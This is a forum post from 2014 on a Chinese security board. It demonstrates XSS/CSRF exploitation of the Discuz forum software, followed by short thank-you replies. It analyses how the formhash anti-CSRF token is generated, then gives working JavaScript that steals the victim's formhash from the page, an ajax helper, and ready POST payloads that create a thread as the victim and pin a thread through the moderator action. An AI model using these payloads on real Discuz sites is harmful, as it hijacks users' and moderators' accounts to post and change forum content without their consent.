社区首页 › 漏洞情报 › Discuz xss利用演示( 劫持发帖,置顶帖子等)

至高无上 发表于 2014-7-20 08:13:21

Discuz xss利用演示( 劫持发帖,置顶帖子等)

Discuz formhash 简单分析

熟悉discuz的都知道,formhash是一种类似验证码的东西，用来防止从我们网站外部提交数据，但不需要我们手动输入,它在页面打开时就已经生成了，存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。

其相应服务端验证代码
if (submitcheck('formhash')) {

我们来看这货的生成算法
substr(md5(substr($_G['timestamp'], 0, -7).$_G['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8);

时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的.

获取 formhash
当我们进行csrf操作时,首先得获取目标的 formhash,例如用户这里的提醒xss
<code>
var hash;

function getHash(){
for(var i=0; i<document.links.length; i++)
{
if(document.links.href.indexOf("action=logout&formhash=")>0)
{
hash=document.links.href;
hash=hash.substr(hash.length-8,hash.length);
break;
} } }


Csrf 代码编写
得到了formhash就简单了 只要抓取各种 post包即可做各种猥琐事情了 ,这里笔者用了个

兼容的ajax库(截取自jquery中的 ajax代码)
x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
callback(ajax.responseText)
}
}
}
},
display:function(o){
if(typeof(o)=='object'){
var str='';
for(a in o){

str+=a+'='+o+'&';
}
str=str.substr(0,str.length-1);
return str;
}else{
return o;
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content=x.display(content);
ajax.send(content);
x.handle(ajax, callback)
},
}


发帖操作
x.post("forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes","formhash="+hash+"&posttime=1353989838&wysiwyg=1&subject=title&message=aaaaaaaaaaaaaaaa%0D%0A&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");


置顶帖子
x.post("forum.php?mod=topicadmin&action=moderate&optgroup=1&modsubmit=yes&infloat=yes&inajax=1","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style=0&highlight_style=0&highlight_style=0&expirationhighlight=&reason=");

广岛秋泽 发表于 2014-7-20 08:49:28

谢谢分享~         

冰清（君子） 发表于 2014-7-20 09:59:46

支持原创   谢谢楼主分享

蓝色_ 发表于 2014-7-20 19:19:54

这个屌！

90_ 发表于 2014-7-20 19:54:56

2012年的东西，楼主现在发出来有什么意义吗

寂寞的我 发表于 2014-7-20 22:13:28

谢谢楼主分享

mer4en7y 发表于 2014-7-22 09:57:40

good 感谢分享

leng 发表于 2014-7-22 11:54:22

谢谢楼主分享

SquirrelMAN 发表于 2014-7-22 16:47:39

不错噢~~~~~

a3430375 发表于 2014-7-24 21:14:38

查看完整版本: Discuz xss利用演示( 劫持发帖,置顶帖子等)